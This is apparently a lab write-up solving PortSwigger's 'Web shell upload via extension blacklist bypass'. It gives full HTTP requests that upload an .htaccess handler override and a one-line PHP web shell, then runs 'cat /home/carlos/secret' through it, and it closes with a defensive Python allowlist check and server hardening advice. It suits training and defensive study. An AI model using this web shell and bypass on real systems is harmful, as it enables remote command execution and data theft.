Web shell upload via extension blacklist bypass
Solution
Log in to PA as user wiener
L: wiener
P: peter
Upload file: .htaccess
Content of file
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Web shell upload via extension blacklist bypass]
└─$ cat .htaccess
AddType application/x-httpd-php .hack
---
Upload .htaccess
POST /my-account/avatar HTTP/2
Host: 0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Cookie: session=CXLpUNpZJDgxbAAPAB3YaHlbSakmZVp5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------291590563116752919603639149352
Content-Length: 533
Origin: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Referer: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------291590563116752919603639149352
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: application/octet-stream

AddType application/x-httpd-php .hack
-----------------------------291590563116752919603639149352
Content-Disposition: form-data; name="user"

wiener
-----------------------------291590563116752919603639149352
Content-Disposition: form-data; name="csrf"

sTeov2hWu4or3x68DbBoLVxzn4DJqIt4
-----------------------------291590563116752919603639149352--
Upload webshell
Content of file
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Web shell upload via extension blacklist bypass]
└─$ cat webshell.hack
<?php echo system($_GET['cmd']); ?>
---
Upload webshell
POST /my-account/avatar HTTP/2
Host: 0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Cookie: session=CXLpUNpZJDgxbAAPAB3YaHlbSakmZVp5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------339534280341599772712996490397
Content-Length: 535
Origin: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Referer: https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net/my-account
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------339534280341599772712996490397
Content-Disposition: form-data; name="avatar"; filename="webshell.hack"
Content-Type: application/octet-stream

<?php echo system($_GET['cmd']); ?>
-----------------------------339534280341599772712996490397
Content-Disposition: form-data; name="user"

wiener
-----------------------------339534280341599772712996490397
Content-Disposition: form-data; name="csrf"

sTeov2hWu4or3x68DbBoLVxzn4DJqIt4
-----------------------------339534280341599772712996490397--
Read secret from: /home/carlos/secret
GET /files/avatars/webshell.hack?cmd=cat%20/home/carlos/secret HTTP/2
Host: 0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net
Cookie: session=CXLpUNpZJDgxbAAPAB3YaHlbSakmZVp5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
---
HTTP/2 200 OK
Date: Thu, 02 Jan 2025 11:39:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 64

AHw7OztBr1eb3EdKFZgz8AIDNVyo21vlAHw7OztBr1eb3EdKFZgz8AIDNVyo21vl
---
https://0a4800ec04fae33c811d4d9800cf00bf.web-security-academy.net/files/avatars/webshell.hack?cmd=cat%20/home/carlos/secret
Secret: AHw7OztBr1eb3EdKFZgz8AIDNVyo21vlAHw7OztBr1eb3EdKFZgz8AIDNVyo21vl
Submit solution
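Why both uploads above pass an extension blacklist, next to an allowlist check that rejects them, as an added example that is not code from the lab or from this write-up. The blacklist contents, the allowed image types and the function names are assumptions chosen for illustration.

```python
import os
import secrets

# Assumed blacklist, modelling the kind of filter the lab title describes.
BLACKLIST = {".php", ".php3", ".php5", ".phtml", ".phar"}

# Assumed allowlist for an avatar upload: extension -> leading magic bytes.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def blacklist_accepts(filename):
    """Weak check: reject only extensions known to be dangerous."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLACKLIST


def allowlist_store_name(filename, data):
    """Strict check: return a server-generated name, or None to reject."""
    base = os.path.basename(filename.replace("\\", "/"))
    # Dotfiles (.htaccess) and multi-dot names (a.php.png) are never avatars.
    if base.startswith(".") or base.count(".") != 1:
        return None
    ext = os.path.splitext(base)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    # The client-supplied name is discarded, so it cannot pick a handler.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed samples mirroring the two uploads in the write-up.
    samples = [
        (".htaccess", b"AddType application/x-httpd-php .hack\n"),
        ("webshell.hack", b"<?php /* body omitted */ ?>"),
        ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, body in samples:
        print(name, blacklist_accepts(name), allowlist_store_name(name, body))
```

Application-side validation only covers half of the chain shown above: the upload directory should also be served with `AllowOverride None` and no script handler, so that a stray `.htaccess` is ignored and nothing stored there is executed.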